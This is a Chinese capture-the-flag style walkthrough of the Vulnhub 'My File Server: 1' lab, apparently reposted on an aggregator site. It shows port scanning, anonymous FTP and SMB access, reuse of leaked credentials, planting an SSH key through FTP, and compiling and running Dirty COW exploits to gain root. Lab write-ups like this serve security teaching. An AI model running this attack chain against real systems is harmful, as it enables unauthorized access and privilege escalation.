Vulnhub靶机渗透:MY FILE SERVER: 1

news2024/11/18 7:34:28

MY FILE SERVER: 1

  • nmap扫描
    • 端口扫描
    • 服务扫描
    • 漏洞扫描
    • 选择渗透方向
  • 21/2121 ftp
  • 445 samba
  • 2049/20048 nfs
  • 80 http
    • 目录爆破
  • 获得立足点
  • 提权
    • 40611
    • 40847
  • 获取flag

靶机链接: https://www.vulnhub.com/entry/my-file-server-1,432/
靶机IP:192.168.54.33
kali IP:192.168.54.128

nmap扫描

端口扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:23:28 2023 as: nmap -sT --min-rate 10000 -p- -oN nmap/ports 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.0050s latency).
Not shown: 64504 filtered tcp ports (no-response), 19 filtered tcp ports (host-unreach), 1004 closed tcp ports (conn-refused)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:23:41 2023 -- 1 IP address (1 host up) scanned in 13.33 seconds
# Nmap 7.93 scan initiated Sun Jun 11 14:24:25 2023 as: nmap -sU --min-rate 10000 --top-ports 20 -oN nmap/udp 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00035s latency).

PORT      STATE         SERVICE
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    filtered      tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   filtered      microsoft-ds
500/udp   filtered      isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp filtered      unknown
MAC Address: 00:0C:29:42:CC:6A (VMware)

# Nmap done at Sun Jun 11 14:24:25 2023 -- 1 IP address (1 host up) scanned in 0.48 seconds

处理信息,获取开放端口

# yunki @ yunki in ~/vulnhub/myfileserver1 [14:27:24] 
$ grep open nmap/ports | awk -F'/' '{print$1}'| paste -sd ','
21,22,80,111,445,2049,2121,20048

服务扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:29:33 2023 as: nmap -sT -sVC -O -p21,22,80,111,445,2049,2121,20048 -oN nmap/details 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00045s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    3 0        0              16 Feb 19  2020 pub [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.54.128
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 75fa37d1624a15877e2183b92fff0493 (RSA)
|   256 b8db2ccae270c3eb9aa8cc0ea21c686b (ECDSA)
|_  256 66a31b55cac2518441217f774045d49f (ED25519)
80/tcp    open  http        Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: My File Server
|_http-server-header: Apache/2.4.6 (CentOS)
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100003  3,4         2049/udp   nfs
|   100003  3,4         2049/udp6  nfs
|   100005  1,2,3      20048/tcp   mountd
|   100005  1,2,3      20048/tcp6  mountd
|   100005  1,2,3      20048/udp   mountd
|   100005  1,2,3      20048/udp6  mountd
|   100021  1,3,4      34309/tcp6  nlockmgr
|   100021  1,3,4      39139/tcp   nlockmgr
|   100021  1,3,4      49696/udp   nlockmgr
|   100021  1,3,4      60509/udp6  nlockmgr
|   100024  1          34732/tcp6  status
|   100024  1          43955/tcp   status
|   100024  1          45560/udp   status
|   100024  1          57303/udp6  status
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
445/tcp   open  netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp  open  nfs_acl     3 (RPC #100227)
2121/tcp  open  ftp         ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: ERROR
20048/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:42:CC:6A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13, Linux 3.10, Linux 3.4 - 3.10
Network Distance: 1 hop
Service Info: Host: FILESERVER; OS: Unix

Host script results:
|_clock-skew: mean: 6h10m01s, deviation: 3h10m28s, median: 7h59m58s
| smb2-time: 
|   date: 2023-06-11T14:29:43
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.1)
|   Computer name: localhost
|   NetBIOS computer name: FILESERVER\x00
|   Domain name: \x00
|   FQDN: localhost
|_  System time: 2023-06-11T19:59:47+05:30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 11 14:29:54 2023 -- 1 IP address (1 host up) scanned in 21.59 seconds

漏洞扫描

# Nmap 7.93 scan initiated Sun Jun 11 14:30:11 2023 as: nmap --script=vuln -p21,22,80,111,445,2049,2121,20048 -oN nmap/vuln 192.168.54.33
Nmap scan report for 192.168.54.33
Host is up (0.00029s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
111/tcp   open  rpcbind
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
20048/tcp open  mountd
MAC Address: 00:0C:29:42:CC:6A (VMware)

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-061: false

# Nmap done at Sun Jun 11 14:30:54 2023 -- 1 IP address (1 host up) scanned in 42.80 seconds

选择渗透方向

观察服务,发现

  • 21端口,ftp服务,可以匿名登录,可写。
  • 22端口,openssh服务。
  • 80端口,apache服务。操作系统centos。
  • 111端口,rpc服务。
  • 445端口,samba服务,tcp协议。
  • 2049端口,nfs服务,和111端口上的细节可以呼应上。
  • 2121端口,ftp服务,可以匿名登录。
  • 20048端口,可以挂载nfs服务,与111端口相呼应。
    总结一下:21, samba,nfs, 80....

21/2121 ftp

$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    3 0        0              16 Feb 19  2020 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    9 0        0            4096 Feb 19  2020 log
226 Directory send OK.
ftp> cd log
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Feb 19  2020 anaconda
drwxr-x---    2 0        0              22 Feb 19  2020 audit
-rw-r--r--    1 0        0            7033 Feb 19  2020 boot.log
-rw-------    1 0        0           10752 Feb 19  2020 btmp
-rw-r--r--    1 0        0            9161 Feb 19  2020 cron
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg
-rw-r--r--    1 0        0           31971 Feb 19  2020 dmesg.old
drwxr-xr-x    2 0        0               6 Feb 19  2020 glusterfs
drwx------    2 0        0              39 Feb 19  2020 httpd
-rw-r--r--    1 0        0          292584 Feb 19  2020 lastlog
-rw-------    1 0        0            3764 Feb 19  2020 maillog
-rw-------    1 0        0         1423423 Feb 19  2020 messages
drwx------    2 0        0               6 Feb 19  2020 ppp
drwx------    4 0        0              43 Feb 19  2020 samba
-rw-------    1 0        0           63142 Feb 19  2020 secure
-rw-------    1 0        0               0 Feb 19  2020 spooler
-rw-------    1 0        0               0 Feb 19  2020 tallylog
drwxr-xr-x    2 0        0              22 Feb 19  2020 tuned
-rw-r--r--    1 0        0           58752 Feb 19  2020 wtmp
-rw-------    1 0        0             100 Feb 19  2020 xferlog
-rw-------    1 0        0           18076 Feb 19  2020 yum.log
226 Directory send OK.

通过查看,这里比较感兴趣的是secure文件,但是目前没有权限,检查一下2121端口

$ ftp 192.168.54.33 2121
Connected to 192.168.54.33.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [192.168.54.33]
Name (192.168.54.33:yunki): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxrwxrwx   3 root     root           16 Feb 19  2020 pub
226 Transfer complete
ftp> cd pub
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   9 root     root         4096 Feb 19  2020 log
226 Transfer complete
ftp> cd log
250 CWD command successful
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x   2 root     root         4096 Feb 19  2020 anaconda
drwxr-x---   2 root     root           22 Feb 19  2020 audit
-rw-r--r--   1 root     root         7033 Feb 19  2020 boot.log
-rw-------   1 root     root        10752 Feb 19  2020 btmp
-rw-r--r--   1 root     root         9161 Feb 19  2020 cron
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg
-rw-r--r--   1 root     root        31971 Feb 19  2020 dmesg.old
drwxr-xr-x   2 root     root            6 Feb 19  2020 glusterfs
drwx------   2 root     root           39 Feb 19  2020 httpd
-rw-r--r--   1 root     root       292584 Feb 19  2020 lastlog
-rw-------   1 root     root         3764 Feb 19  2020 maillog
-rw-------   1 root     root      1423423 Feb 19  2020 messages
drwx------   2 root     root            6 Feb 19  2020 ppp
drwx------   4 root     root           43 Feb 19  2020 samba
-rw-------   1 root     root        63142 Feb 19  2020 secure
-rw-------   1 root     root            0 Feb 19  2020 spooler
-rw-------   1 root     root            0 Feb 19  2020 tallylog
drwxr-xr-x   2 root     root           22 Feb 19  2020 tuned
-rw-r--r--   1 root     root        58752 Feb 19  2020 wtmp
-rw-------   1 root     root          100 Feb 19  2020 xferlog
-rw-------   1 root     root        18076 Feb 19  2020 yum.log
226 Transfer complete
ftp> exit
221 Goodbye.

和21端口一样没有信息。那就下一个。

445 samba

$ sudo smbmap -H 192.168.54.33          
[+] IP: 192.168.54.33:445       Name: 192.168.54.33                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        smbdata                                                 READ, WRITE     smbdata
        smbuser                                                 NO ACCESS       smbuser
        IPC$                                                    NO ACCESS       IPC Service (Samba 4.9.1)
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:27:56] 
$ smbclient //192.168.54.33/smbdata
Password for [WORKGROUP\yunki]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls -liah
NT_STATUS_NO_SUCH_FILE listing \-liah
smb: \> ls
  .                                   D        0  Sun Jun 11 23:01:12 2023
  ..                                  D        0  Tue Feb 18 19:47:54 2020
  anaconda                            D        0  Tue Feb 18 19:48:15 2020
  audit                               D        0  Tue Feb 18 19:48:15 2020
  boot.log                            N     6120  Tue Feb 18 19:48:16 2020
  btmp                                N      384  Tue Feb 18 19:48:16 2020
  cron                                N     4813  Tue Feb 18 19:48:16 2020
  dmesg                               N    31389  Tue Feb 18 19:48:16 2020
  dmesg.old                           N    31389  Tue Feb 18 19:48:16 2020
  glusterfs                           D        0  Tue Feb 18 19:48:16 2020
  lastlog                             N   292292  Tue Feb 18 19:48:16 2020
  maillog                             N     1982  Tue Feb 18 19:48:16 2020
  messages                            N   684379  Tue Feb 18 19:48:17 2020
  ppp                                 D        0  Tue Feb 18 19:48:17 2020
  samba                               D        0  Tue Feb 18 19:48:17 2020
  secure                              N    11937  Tue Feb 18 19:48:17 2020
  spooler                             N        0  Tue Feb 18 19:48:17 2020
  tallylog                            N        0  Tue Feb 18 19:48:17 2020
  tuned                               D        0  Tue Feb 18 19:48:17 2020
  wtmp                                N    25728  Tue Feb 18 19:48:17 2020
  xferlog                             N      100  Tue Feb 18 19:48:17 2020
  yum.log                             N    10915  Tue Feb 18 19:48:17 2020
  sshd_config                         N     3906  Wed Feb 19 15:46:38 2020

                19976192 blocks of size 1024. 18284616 blocks available
smb: \> get secure
getting file \secure of size 11937 as secure (685.7 KiloBytes/sec) (average 685.7 KiloBytes/sec)
smb: \> get sshd_config
getting file \sshd_config of size 3906 as sshd_config (762.9 KiloBytes/sec) (average 703.3 KiloBytes/sec)
smb: \> exit

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:14] 
$ cat secure      
...
# yunki @ yunki in ~/vulnhub/myfileserver1 [15:28:18] 
$ cat sshd_config
...

通过阅读secure文件,发现了以下信息。
在这里插入图片描述
写入cred.txt

$ echo 'smbuser:chauthtok' >> cred.txt

这里尝试一下密码碰撞,登录21端口ftp,失败。 2121端口,ftp失败,22端口欧ssh,失败。
通过阅读额sshd_config文件,能够看到以下信息。
在这里插入图片描述
目前只能密钥登录,所以ssh使用密码登录已经不可能了。

2049/20048 nfs

$ showmount -e 192.168.54.33       
Export list for 192.168.54.33:
/smbdata 192.168.56.0/24

这里显示存在smbdata,但是需要在56网段才可以访问,目前的环境是54,就先不麻烦修改了,先尝试其他思路,如果实在没有突破口了,就回到这里继续。

80 http

打开网页,就发现一个my file server就没有了。直接目录爆破。

目录爆破

$ sudo gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip,html,rar,txt,sql,jsp,php --url http://192.168.54.33/ --no-error| tee gobuster.log
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.33/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,zip,html,rar,txt,sql,jsp
[+] Timeout:                 10s
===============================================================
2023/06/11 15:41:29 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 174]
/.html                (Status: 403) [Size: 207]
/readme.txt           (Status: 200) [Size: 25]
/.html                (Status: 403) [Size: 207]
Progress: 1761220 / 1764488 (99.81%)
===============================================================
2023/06/11 15:45:23 Finished
===============================================================
Progress: 1764480 / 1764488 (100.00%)

发现了存在readme.txt,访问发现密码,写入到cred.txt中

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:43:58] C:130
$ curl http://192.168.54.33/readme.txt
My Password is
rootroot1

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:09] 
$ echo rootroot1 >> cred.txt

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:44:25] 
$ cat cred.txt                        
smbuser:chauthtok
rootroot1

由于无法使用密码登录ssh,重新使用这个密码进行碰撞ftp/smb服务。

获得立足点

这里使用smbuser:rootroot1登录到ftp服务中,发现路径是/home/smbuser

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:46:24] 
$ ftp 192.168.54.33     
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
257 "/home/smbuser"

这里可以想到用ssh-keygen生成公钥和私钥,将公钥上传到之前发现的路径~/.ssh/authorized_keys中,然后使用私钥登录。尝试一下。
先试用ssh-keygen生成密钥对。

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:48:41] 
$ sudo ssh-keygen                       
[sudo] yunki 的密码:
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): test
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in test
Your public key has been saved in test.pub
The key fingerprint is:
SHA256:g8VyEwz68HDLaiwG1bhiWpvVUXZEk61+38D/W91oabo root@yunki
The key's randomart image is:
+---[RSA 3072]----+
|      .o+o=o     |
|   o . +.o...    |
|  o = + =  .     |
| . . O B ..      |
|o.o . B S.   .   |
|o+ = .   .. . ooo|
|. = +      . .=++|
| . o         +. +|
|            E. .+|
+----[SHA256]-----+

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:03] 
$ ls
80  cred.txt  gobuster.log  linPEAS.sh  nmap  secure  sshd_config  test  test.pub

改成之前sshd_config文件里要求的名称。重新连接ftp,创建.ssh文件夹,上传文件,退出,ssh -i登录。成功! 获得立足点!

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:04] 
$ cp test.pub authorized_keys       

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:23] 
$ ftp 192.168.54.33
Connected to 192.168.54.33.
220 (vsFTPd 3.0.2)
Name (192.168.54.33:yunki): smbuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/smbuser"
ftp> mkdir .ssh
257 "/home/smbuser/.ssh" created
ftp> cd .ssh
250 Directory successfully changed.
ftp> put authorized_keys 
local: authorized_keys remote: authorized_keys
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
564 bytes sent in 0.00 secs (4.7599 MB/s)
ftp> exit
221 Goodbye.

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:49:45] 
$ sudo ssh -i test smbuser@192.168.54.33
   ##############################################################################################
   #                                      Armour Infosec                                        #
   #                         --------- www.armourinfosec.com ------------                       #
   #                                    My File Server - 1                                      #
   #                               Designed By  :- Akanksha Sachin Verma                        #
   #                               Twitter      :- @akankshavermasv                             #
   ##############################################################################################

Last login: Thu Feb 20 16:42:21 2020
[smbuser@fileserver ~]$ whoami
smbuser

提权

[smbuser@fileserver ~]$ whoami
smbuser
[smbuser@fileserver ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1545sec preferred_lft 1545sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever
[smbuser@fileserver ~]$ uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

这里发现内核版本较低,可以尝试使用内核提权。先上传一下linPEAS.sh,收集一下信息。

kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:16] 
$ ls linPEAS.sh 
linPEAS.sh

# yunki @ yunki in ~/vulnhub/myfileserver1 [15:56:26] 
$ php -S 0:80
[Sun Jun 11 15:56:28 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Accepted
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 [200]: (null) /linPEAS.sh
[Sun Jun 11 15:56:40 2023] 192.168.54.33:60229 Closing

靶机

smbuser@fileserver ~]$ cd /tmp
[smbuser@fileserver tmp]$ ls
systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ wget http://192.168.54.128/linPEAS.sh
--2023-06-11 21:00:34--  http://192.168.54.128/linPEAS.sh
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:828172 (809K) [application/x-sh]
正在保存至: “linPEAS.sh”

100%[===============================================================================================================>] 828,172     --.-K/s 用时 0.03s   

2023-06-11 21:00:34 (30.8 MB/s) - 已保存 “linPEAS.sh” [828172/828172])

[smbuser@fileserver tmp]$ chmod +x linPEAS.sh 
[smbuser@fileserver tmp]$ ./linPEAS.sh 

通过观察结果,这里列出比较有用的内核提权信息。
在这里插入图片描述
先尝试尝试这两个,先下载到kali里,然后kali开启服务器。
kali

# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:18] C:130
$ searchsploit -m 40611 40847           
  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
      URL: https://www.exploit-db.com/exploits/40611
     Path: /usr/share/exploitdb/exploits/linux/local/40611.c
    Codes: CVE-2016-5195
 Verified: True
File Type: C source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40611.c


  Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)
      URL: https://www.exploit-db.com/exploits/40847
     Path: /usr/share/exploitdb/exploits/linux/local/40847.cpp
    Codes: CVE-2016-5195
 Verified: True
File Type: C++ source, ASCII text
Copied to: /home/yunki/vulnhub/myfileserver1/40847.cpp



# yunki @ yunki in ~/vulnhub/myfileserver1 [16:00:35] 
$ php -S 0:80
[Sun Jun 11 16:00:51 2023] PHP 7.4.15 Development Server (http://0:80) started
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Accepted
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 [200]: (null) /40611.c
[Sun Jun 11 16:01:07 2023] 192.168.54.33:60235 Closing
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Accepted
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 [200]: (null) /40847.cpp
[Sun Jun 11 16:01:16 2023] 192.168.54.33:60236 Closing

40611

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40611.c
--2023-06-11 21:05:01--  http://192.168.54.128/40611.c
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:2821 (2.8K) [text/x-c]
正在保存至: “40611.c”

100%[===============================================================================================================>] 2,821       --.-K/s 用时 0s      

2023-06-11 21:05:01 (666 MB/s) - 已保存 “40611.c” [2821/2821])


[smbuser@fileserver tmp]$ ls
40611.c  40847.cpp  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ head 40611.c 
/*
####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -pthread dirtyc0w.c -o dirtyc0w


[smbuser@fileserver tmp]$ gcc -pthread 40611.c -o 40611
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content

根据提示好像只能读取文件,尝试一下能不能读取/etc/shadow文件。

[smbuser@fileserver tmp]$ ./40611 
usage: dirtyc0w target_file new_content
[smbuser@fileserver tmp]$ ./40611 /etc/shadow /tmp/shadow
mmap ffffffffffffffff

 
ls
^C
[smbuser@fileserver tmp]$ ls
40611  40611.c  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT

好像没有读取到,失败~

40847

[smbuser@fileserver tmp]$ wget http://192.168.54.128/40847.cpp
--2023-06-11 21:05:10--  http://192.168.54.128/40847.cpp
正在连接 192.168.54.128:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:10212 (10.0K) [text/x-c]
正在保存至: “40847.cpp”

100%[===============================================================================================================>] 10,212      --.-K/s 用时 0s      

2023-06-11 21:05:10 (410 MB/s) - 已保存 “40847.cpp” [10212/10212])


[smbuser@fileserver tmp]$ head 40847.cpp 
// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s    (Will automatically do "echo 0 > /proc/sys/vm/dirty_writeback_centisecs")
//
// -----------------------------------------------------------------
// Copyright (C) 2016  Gabriele Bonacini
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation; either version 3 of the License, or
// (at your option) any later version.


[smbuser@fileserver tmp]$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
[smbuser@fileserver tmp]$ ls
40611  40611.c  40847.cpp  dcow  linPEAS.sh  systemd-private-c647a2df6aae4899bee3bbf03ef953ca-httpd.service-1GFcXT
[smbuser@fileserver tmp]$ ./dcow
Running ...
Received su prompt (密码:)
Root password is:   dirtyCowFun
Enjoy! :-)

利用成功,生成了密码dirtyCowFun,直接切换root用户。

[smbuser@fileserver tmp]$ su
密码:
[root@fileserver tmp]# whoami
root

获取flag

[root@fileserver tmp]# whoami
root

[root@fileserver tmp]# uname -a
Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

[root@fileserver tmp]# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens32: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:42:cc:6a brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.33/24 brd 192.168.54.255 scope global dynamic ens32
       valid_lft 1440sec preferred_lft 1440sec
    inet6 fe80::20c:29ff:fe42:cc6a/64 scope link 
       valid_lft forever preferred_lft forever

[root@fileserver tmp]# ls /root
proof.txt
[root@fileserver tmp]# cat proof.txt
cat: proof.txt: 没有那个文件或目录
[root@fileserver tmp]# cat /root/proof.txt 
Best of Luck
af52e0163b03cbf7c6dd146351594a43

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/634088.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

人工智能轨道交通行业周刊-第48期(2023.6.5-6.11)

本期关键词&#xff1a;铁路测绘、动车组限速、铁路四电、智源大会、苹果AR眼镜、AIGC商业落地 1 整理涉及公众号名单 1.1 行业类 RT轨道交通人民铁道世界轨道交通资讯网铁路信号技术交流北京铁路轨道交通网上榜铁路视点ITS World轨道交通联盟VSTR铁路与城市轨道交通RailMet…

如何通过绩效考核对互联网人精准打击条条致命?

在“经济形势就业压力”的双重打击下&#xff0c;打工人变得越来越温顺。曾经闹着要整顿职场的大多年轻人&#xff0c;也从年少轻狂逐步走向少年老成&#xff0c;突然少了许多“XX后整顿职场”这样的声音。在严峻的复杂形势下&#xff0c;大多公司为了降本增效&#xff0c;殚精…

2017~2018学年《信息安全》考试试题(A3卷)

北京信息科技大学 2017 ~2018 学年第一学期 《信息安全》考试试题 (A3 卷) 课程所在学院&#xff1a;计算机学院 适用专业班级&#xff1a; - 考试形式&#xff1a;闭卷 一、单选题(本题满分 20 分&#xff0c;共含 10 道小题&#xff0c;每小题 2 分) Wanncry 勒索攻击通过加…

LLM下的讨论230611

三、我们能研究什么&#xff1f; 在大模型时代&#xff0c;可以考虑深挖的方向&#xff0c;供大家参考&#xff1a; 3.1 Retrieval augmented in-context learningGPTs完成了NLP范式的更新迭代&#xff1a;从传统的有监督学习&#xff08;Supervised Learning&#xff09;转变…

有趣的图(一)(55)

